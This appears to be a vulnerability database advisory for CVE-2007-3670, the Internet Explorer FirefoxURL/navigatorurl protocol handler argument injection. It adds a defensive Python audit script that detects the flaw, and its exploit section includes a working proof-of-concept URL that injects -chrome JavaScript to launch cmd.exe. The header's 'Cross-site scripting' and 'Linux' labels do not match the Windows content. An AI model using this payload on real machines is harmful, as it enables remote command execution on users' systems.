Microsoft IE FirefoxURL Protocol Handler Command Injection Vulnerability

Vulnerability ID: 1113281    Vulnerability type: Cross-site scripting
Published: 2007-07-10    Updated: 2009-05-05
CVE ID: CVE-2007-3670    CNNVD ID: CNNVD-200707-163
Platform: Linux    CVSS score: 4.3
|Vulnerability sources
https://www.exploit-db.com/exploits/30285
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200707-163
|Vulnerability details
Internet Explorer is Microsoft's widely used web browser. On machines where Firefox is installed, IE has a command injection vulnerability when it invokes a particular protocol handler; a remote attacker could exploit it to execute arbitrary commands on the user's machine.

On Windows, installing Firefox registers protocol handlers for several Mozilla-specific protocols (such as FirefoxURL and FirefoxHTML). When Windows encounters a URL scheme it cannot handle itself, it searches the Windows registry for an appropriate protocol handler; once the matching handler is found, the URL string is passed to it without any filtering.

Assume Firefox is installed on a Windows system and the FirefoxURL protocol handler is registered. The handler's shell\open command is typically:

[HKEY_CLASSES_ROOT\FirefoxURL\shell\open\command\@]
C:\\PROGRA~1\\MOZILL~2\\FIREFOX.EXE -url "%1" -requestPending

When Internet Explorer encounters a reference to content in the FirefoxURL scheme, it calls ShellExecute with the path of the EXE image and passes the entire request URI through without any input validation. The following request:

FirefoxURL://foo" argument "myvalue

causes Firefox to be launched with the following command line:

"C:\PROGRA~1\MOZILL~2\FIREFOX.EXE" -url "firefoxurl://foo" argument "myvalue/" -requestPending

Arbitrary parameters can therefore be supplied to the firefox.exe process, which amounts to gaining the -chrome command-line argument: the attacker can specify arbitrary JavaScript code, which then runs with the privileges of trusted chrome content.
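The mechanism above (the raw URL substituted into %1 and then re-tokenized by Windows command-line parsing) can be checked for any handler template with the following added example, which is not part of the advisory or of any Mozilla or Microsoft code. The template string is taken from the registry value quoted above; the probe URL is constructed, and windows_argv is a reimplementation of the classic CommandLineToArgvW rules written for this example.

```python
from urllib.parse import quote

# Handler template from the advisory's registry value (backslashes un-doubled).
FIREFOXURL_TEMPLATE = r'C:\PROGRA~1\MOZILL~2\FIREFOX.EXE -url "%1" -requestPending'

def windows_argv(cmdline: str) -> list:
    """Classic CommandLineToArgvW rules: whitespace splits, " toggles quoting."""
    args, cur, in_quotes, have_arg, i = [], [], False, False, 0
    while i < len(cmdline):
        ch = cmdline[i]
        if ch == "\\":                          # backslashes matter only before "
            j = i
            while j < len(cmdline) and cmdline[j] == "\\":
                j += 1
            nbs = j - i
            if j < len(cmdline) and cmdline[j] == '"':
                cur.append("\\" * (nbs // 2))  # 2n backslashes -> n
                if nbs % 2:                     # odd: the quote is literal
                    cur.append('"')
                else:                           # even: the quote still toggles
                    in_quotes = not in_quotes
                j += 1
            else:
                cur.append("\\" * nbs)          # no quote follows: literal
            have_arg, i = True, j
        elif ch == '"':
            in_quotes, have_arg, i = not in_quotes, True, i + 1
        elif ch in " \t" and not in_quotes:
            if have_arg:
                args.append("".join(cur))
                cur, have_arg = [], False
            i += 1
        else:
            cur.append(ch)
            have_arg, i = True, i + 1
    if have_arg:
        args.append("".join(cur))
    return args
def launch_argv(template: str, url: str) -> list:
    # Raw URL substituted into %1 with no filtering, as the advisory describes.
    return windows_argv(template.replace("%1", url))
def handler_is_injectable(template: str, scheme: str = "firefoxurl") -> bool:
    # Audit check: a URL carrying a quote and spaces must not change argc.
    benign = launch_argv(template, scheme + "://example/")
    probe = launch_argv(template, scheme + '://x" -probe "y')  # constructed
    return len(probe) != len(benign)
def sanitize_url(url: str) -> str:
    # Handler-side mitigation: percent-encode quote, whitespace, backslash etc.
    return quote(url, safe=":/?#[]@!$&'()*+,;=%-._~")
```

Running handler_is_injectable on the advisory's template returns True, while the same probe passed through sanitize_url yields the same four-element argv as a benign URL.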
|Exploit
source: http://www.securityfocus.com/bid/24837/info

Microsoft Internet Explorer, Mozilla Firefox and Netscape Navigator are prone to a vulnerability that lets attackers inject commands through the 'firefoxurl' and 'navigatorurl' protocol handlers.

Exploiting these issues allows remote attackers to pass and execute arbitrary commands and arguments through the 'firefox.exe' and 'navigator.exe' processes by employing the 'firefoxurl' and 'navigatorurl' handlers.

An attacker can also employ these issues to carry out cross-browser scripting attacks by using the '-chrome' argument. This can allow the attacker to run JavaScript code with the privileges of trusted Chrome context and gain full access to Firefox and Netscape Navigator's resources.

Exploiting these issues would permit remote attackers to influence command options that can be called through the 'firefoxurl' and 'navigatorurl' handlers and therefore execute commands and script code with the privileges of a user running the applications. Successful attacks may result in a variety of consequences, including remote unauthorized access. 

navigatorurl:test"%20-chrome%20"javascript:C=Components.classes;I=Components.interfaces;file=C['@mozilla.org/file/local;1'].createInstance(I.nsILocalFile);file.initWithPath('C:'+String.fromCharCode(92)+String.fromCharCode(92)+'Windows'+String.fromCharCode(92)+String.fromCharCode(92)+'System32'+String.fromCharCode(92)+String.fromCharCode(92)+'cmd.exe');process=C['@mozilla.org/process/util;1'].createInstance(I.nsIProcess);process.init(file);process.run(true%252c{}%252c0);alert(process)
|References

Source: US-CERT
Name: TA07-199A
Link: http://www.us-cert.gov/cas/techalerts/TA07-199A.html
Source: US-CERT
Name: VU#358017
Link: http://www.kb.cert.org/vuls/id/358017
Source: XF
Name: ie-firefoxurl-command-execution(35346)
Link: http://xforce.iss.net/xforce/xfdb/35346
Source: MISC
Link: http://www.xs-sniper.com/sniperscope/IE-Pwns-Firefox.html
Source: MISC
Link: http://www.virusbtn.com/news/virus_news/2007/07_11.xml
Source: UBUNTU
Name: USN-503-1
Link: http://www.ubuntu.com/usn/usn-503-1
Source: MISC
Link: http://www.theregister.co.uk/2007/07/11/ie_firefox_vuln/
Source: SECTRACK
Name: 1018360
Link: http://www.securitytracker.com/id?1018360
Source: SECTRACK
Name: 1018351
Link: http://www.securitytracker.com/id?1018351
Source: BID
Name: 24837
Link: http://www.securityfocus.com/bid/24837
Source: BUGTRAQ
Name: 20070710 Internet Explorer 0day exploit
Link: http://www.securityfocus.com/archive/1/archive/1/473276/100/0/threaded
Source: SUSE
Name: SUSE-SA:2007:049
Link: http://www.novell.com/linux/security/advisories/2007_49_mozilla.html
Source: www.mozilla.org
Link: http://www.mozilla.org/security/announce/2007/mfsa2007-23.